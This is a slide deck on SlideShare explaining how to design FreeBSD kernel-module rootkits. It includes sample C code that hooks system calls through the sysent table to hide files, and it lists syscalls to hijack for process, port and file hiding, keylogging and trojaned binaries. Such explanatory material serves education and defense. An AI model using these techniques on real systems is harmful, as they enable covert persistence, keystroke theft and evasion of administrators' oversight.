Tripwyre

472 views

Published on

Published in: Technology, Education
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
472
On SlideShare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
8
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Tripwyre

  1. 1. UNIX Rootkits – Design and Implementation Satish Srinivasan sathya@freeshell.org twitter.com/tripwyre
  2. 2. Overview of Presentation * Why LKM Rootkits? * Rootkit Design * How Hooking Works? * Identifying System Calls * Hijacking System Calls * Implementing System Calls * System Calls to Hijack
  3. 3. Why LKM Rootkits? * Direct Access to Kernel * Monitoring actions of users * Advanced Stealth Mechanisms * Monitoring intrusions on Honeypots * Overriding OS Protections * Studying proprietary protocols * Practical Education on OS Kernels!
  4. 4. Rootkit Design User User Mode Control Interface Loadable Kernel Module Driver Operating System Kernel System
  5. 5. How Hooking Works? Normal Execution User Mode System Call Program Function Our Hooked System Call Hooked Execution
  6. 6. Identifying System Calls Kernel Process Tracing kdump – Dump a part or all of the kernel memory to analyze the calling of system calls in the user-mode programs. ktrace - Trace the execution of the program to fnd the system calls it calls and the operations it does.
  7. 7. U s i n g ktrace and kdump $ ktrace who exampleuser ttyv0 Jan 28 21:36 exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) $ kdump 548 ktrace RET ktrace 0 548 ktrace CALL execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34) 548 ktrace NAMI quot;/usr/bin/whoquot; 548 ktrace NAMI quot;/libexec/ld-elf.so.1quot; 548 who RET execve 0 548 who CALL mmap(0,0xe18,0x3,0x1000,0xffffffff,0,0,0) 548 who RET mmap 671535104/0x2806d000 548 who CALL munmap(0x2806d000,0xe18) 548 who RET munmap 0 548 who CALL __sysctl(0xbfbfead8,0x2,0x28069998,0xbfbfead4,0,0) 548 who RET __sysctl 0 548 who CALL mmap(0,0x8000,0x3,0x1002,0xffffffff,0,0,0) 548 who RET mmap 671535104/0x2806d000 548 who CALL issetugid 548 who RET issetugid 0 548 who CALL open(0x28065c28,0,0x1b6) 548 who NAMI quot;/etc/libmap.confquot; 548 who RET open -1 errno 2 No such file or directory 548 who CALL open(0x28064e80,0,0) 548 who NAMI quot;/var/run/ld-elf.so.hintsquot; 548 who RET open 3 548 who CALL read(0x3,0xbfbfeaa0,0x80) 548 who GIO fd 3 read 128 bytes
  8. 8. ... 548 who RET mprotect 0 548 who CALL mmap(0,0x56c0,0x3,0x1000,0xffffffff,0,0,0) 548 who RET mmap 672452608/0x2814d000 548 who CALL munmap(0x2814d000,0x56c0) 548 who RET munmap 0 548 who CALL mprotect(0x28075000,0xc0000,0x5) 548 who RET mprotect 0 548 who CALL sigprocmask(0x1,0x28068820,0xbfbfeb20) 548 who RET sigprocmask 0 548 who CALL sigprocmask(0x3,0x28068830,0) 548 who RET sigprocmask 0 548 who CALL open(0x8049520,0,0x1b6) 548 who NAMI quot;/var/run/utmpquot; 548 who RET open 3 548 who CALL fstat(0x3,0xbfbfead0) ... 548 who RET read 748/0x2ec 548 who CALL fstat(0x1,0xbfbfe330) 548 who RET fstat 0 548 who CALL break(0x804e000) 548 who RET break 0 548 who CALL ioctl(0x1,TIOCGETA,0xbfbfe370) 548 who RET ioctl 0 548 who CALL access(0x2813318c,0x4) 548 who NAMI quot;/etc/localtimequot; 548 who RET access 0 548 who CALL open(0x2813318c,0,0) 548 who NAMI quot;/etc/localtimequot; ...
  9. 9. ... 548 who CALL fstat(0x4,0xbfbfea50) 548 who RET fstat 0 548 who CALL read(0x4,0xbfbfc730,0x1f08) 548 who GIO fd 4 read 109 bytes 0x0000 545a 6966 0000 0000 0000 0000 0000 0000 |TZif............| 0x0010 0000 0000 0000 0004 0000 0004 0000 0000 |................| 0x0020 0000 0004 0000 0004 0000 000d cadb 86b0 |................| 0x0030 cc05 7118 cc95 32a8 d274 1298 0102 0302 |..q...2..t......| 0x0040 0000 52d0 0000 0000 5b68 0004 0000 4d58 |..R.....[h....MX| 0x0050 0009 0000 5b68 0109 484d 5400 4255 5254 |....[h..HMT.BURT| 0x0060 0049 5354 0000 0000 0000 0000 00 |.IST.........| 548 who RET read 109/0x6d 548 who CALL close(0x4) 548 who RET close 0 548 who CALL write(0x1,0x804d000,0x28) 548 who GIO fd 1 wrote 40 bytes quot;exampleuser ttyv0 Jan 28 21:36 quot; 548 who RET write 40/0x28 548 who CALL write(0x1,0x804d000,0x32) 548 who GIO fd 1 wrote 50 bytes quot;exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) quot; 548 who RET write 50/0x32 548 who CALL read(0x3,0x804c000,0x1000) 548 who GIO fd 3 read 0 bytes quot;quot; 548 who RET read 0 548 who CALL close(0x3) 548 who RET close 0 548 who CALL exit(0)
  10. 10. Hijacking System Calls #include <sys/syscall.h> #include <sys/kernel.h> #include <sys/sysent.h> #include <sys/module.h> void load (struct module *module, int cmd, void *args) { switch(cmd) { case MOD_LOAD: /* System Call Hooking; Example read() syscall. */ sysent[SYS_read].sy_call = (sys_call_t *) hooked_read; break; case MOD_UNLOAD: /* System Call Restore; Example getdirentries() syscall */ sysent[SYS_getdirentries].sy_call = (sys_call_t *) getdirentries; break; }}
  11. 11. Implementing System Calls /* Example: Hooking chflags(2) */ int hooked_chflags(struct thread *td, void *syscall_args) { struct chflags_args *uap; uap = (struct chflags_args *) syscall_args; char name[NAME_MAX]; size_t size; if(copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT) return(EFAULT); if(file_hidden(name)) return(ENOENT); return(chflags(td, syscall_args)); }
  12. 12. System Calls To Hijack open, stat, chflags : File Hiding chmod, chown : Change ownership getdirentries : List Directories read, write, writev : Keylogging kill, fork : Process Hiding ...
  13. 13. Feature List * Hide itself from kldstat(1) * Hide a port from netstat(1) * Hide fles and directories * Monitor network for ICMP messages * Capture user keystrokes * Hide a process from ps(1)
  14. 14. Feature List (contd..) * execve(1) redirection for Trojan'ed binaries * Hide a user from who(1) * Controller Mechanism with Authentication using crypt(3) * AES Encryption for Keylogs
  15. 15. Thank You!

×